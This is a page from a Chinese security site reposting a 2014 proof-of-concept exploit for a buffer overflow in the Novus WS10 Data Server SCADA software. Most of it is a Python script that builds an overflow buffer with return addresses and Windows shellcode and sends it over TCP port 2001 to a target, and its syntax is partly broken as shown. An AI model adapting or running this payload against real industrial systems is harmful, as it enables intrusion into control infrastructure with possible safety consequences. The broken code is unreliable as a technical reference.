首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WS10 Data Server SCADA Exploit Overflow PoC
来源:vfocus.net 作者:Pedro 发布时间:2014-09-25  
## Exploit Title: WS10 Data Server SCADA Exploit Overflow PoC
## Date: 09/23/2014
## Author: Pedro Sánchez
## Version: 1.83 (English)
## Tested on: Windows 7 embedded. 
  
## Notified the vendor, vendor never responded.
## In the new version this PoC stops working
   
## Vendor: Novus 
## http://www.novus.com.br
   
## NOVUS Electronics is a manufacturer of instruments for control, data acquisition and supervisory systems, mainly for factory automation 
   
import os
import socket
import sys
  
## The process listens on TCP port 2001
  
host = sys.argv[1]
port = int(sys.argv[2])
   
print " PoC WS10 Data Server SCADA Exploit "
print " Pedro Sanchez "
   
shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9\x44\x80\xc2\x77\xFF\xD1\x90\x90"
   
## Exploit contructor
  
    ws10 = ("\x90" * 1024 + "\x44" * 31788) 
    ws10 += ("\xeb\x14"
    ws10 += ("\x44" * 6) 
    ws10 += ("\xad\xbb\xc3\x77"
    ws10 += ("\xb4\x73\xed\x77")  
    ws10 += ("\x90" * 21) 
    ws10 += shellcode
  
   
print "  [+] Sending payload..."
   
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host,port)) 
s.send(ws10)  
data = s.recv(1024)
   
print "  [+] Closing..."
s.close()  
print "  [+] Done!"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·xcode-select 13.4.0 Buffer Ove
·ZyXEL Prestig P-660HNU-T1 ISP
·Fast Image Resizer 098 - Local
·EMC AlphaStor Device Manager O
·Joomla Face Gallery 1.0 Multip
·Advantech WebAccess dvs.ocx Ge
·Joomla Mac Gallery <= 1.5 Arbi
·Bash Code Injection Proof Of C
·GetSimpleCMS PHP File Upload
·Bash Environment Variable Comm
·Seafile-server <= 3.1.5 - Remo
·Oracle MyOracle Filter Bypass
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved